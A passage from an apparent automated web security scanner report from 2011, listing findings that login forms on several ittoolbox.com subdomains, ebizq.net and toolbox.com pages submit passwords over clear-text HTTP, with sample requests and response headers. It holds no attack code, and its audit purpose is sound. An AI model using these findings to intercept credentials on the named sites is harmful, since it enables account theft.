<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Networking
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.66. http://oracle.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracle.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: oracle.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dnzjqj45bhnnumaespuasb45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Oracle Comm
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.67. http://peoplesoft.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesoft.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: peoplesoft.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70995
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fjxtzvek1n24rc3qv05z1gbj; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   PeopleSoft
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.68. http://projectmanagement.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://projectmanagement.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: projectmanagement.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x1kl5s4525t13p45bqmqziut; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Project Man
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.69. http://sap.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: sap.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 83566
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uelcsg55rouamz55yuh1o455; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SAP Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.70. http://security.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://security.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: security.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81934
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mruc2m45webcko55sgy2f5jm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Security Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.71. http://siebel.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://siebel.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: siebel.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72499
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yvvy0cefbpzquq2it2cgzprn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Siebel Comm
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.72. http://storage.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storage.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: storage.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71718
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qoshvh55jsp2ig55kw2vi245; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Storage Com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.73. http://supplychain.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://supplychain.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: supplychain.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74807
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rqqjl3aklble05amudmoqvyc; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   SCM Communi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.74. http://telephony.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://telephony.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: telephony.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3eypwe552rukfx2gthccur2v; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.75. http://unix.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://unix.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: unix.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 80502
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ciicu055vtcjje45vlgvahbj; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   UNIX Commun
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.76. http://visualbasic.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visualbasic.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: visualbasic.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63969
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pr5xja553zbb0s45ijt4gx45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Visual Basi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.77. http://webdesign.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webdesign.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: webdesign.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79392
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=e3e0aj55kknpbv2uorfonxy4; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Web Design
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.78. http://windows.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://windows.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: windows.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 77587
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nseiegiwhp2img3lqow10z3v; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Windows Com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.79. http://wireless.ittoolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wireless.ittoolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: wireless.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73493
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ssd5o2akjvnbi055fht5lga2; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Wireless Co
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.80. http://www.ebizq.net/blogs/saasweek/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ebizq.net
Path:   /blogs/saasweek/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /blogs/saasweek/ HTTP/1.1
Host: www.ebizq.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:56:55 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six
...[SNIP]...
</div>
<form class="clearBoth" method="post" action="/goldclub/login.php">
<input type="text" value="username" name="username" id="uname" class="uname" onblur="onBlursU('uname')" onclick="onClickU('uname')" />
<input type="password" value="password" name="password" id="pass" class="pass" onblur="onBlursP('pass')" onclick="onClickP('pass')" />
<input type="hidden" name="r" value="http://www.ebizq.net" />
...[SNIP]...

4.81. http://www.toolbox.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21332
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-XRDS-Location: http://www.toolbox.com/xrds.aspx
Set-Cookie: ASP.NET_SessionId=arc3hi45rsb1qy55skamwwbg; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.82. http://www.toolbox.com/Feedback.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /Feedback.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Feedback.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4f3gn55elbncwac4bzxhvnv; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/Feedback.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.83. http://www.toolbox.com/PrivacyPolicy.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /PrivacyPolicy.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /PrivacyPolicy.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35183
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ooszoo554q0sbqbgcenmvfuw; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/PrivacyPolicy.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.84. http://www.toolbox.com/TermsofUse.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /TermsofUse.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /TermsofUse.aspx HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46350
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3xmjev553fihez45e2oo2ivi; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/TermsofUse.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.85. http://www.toolbox.com/about/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /about/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /about/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22640
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=orhdbf455xhzzen32ok4mn2c; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   About Toolb
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/about/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.86. http://www.toolbox.com/careers/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /careers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /careers/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19781
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w25wtxbkl34gxdreyk40jymn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox.com
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/careers/Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

4.87. http://www.toolbox.com/contact/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toolbox.com
Path:   /contact/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact/ HTTP/1.1
Host: www.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=icbksg45hpzrcf55h0vo2x45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:51:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Contact Too
...[SNIP]...
</div>
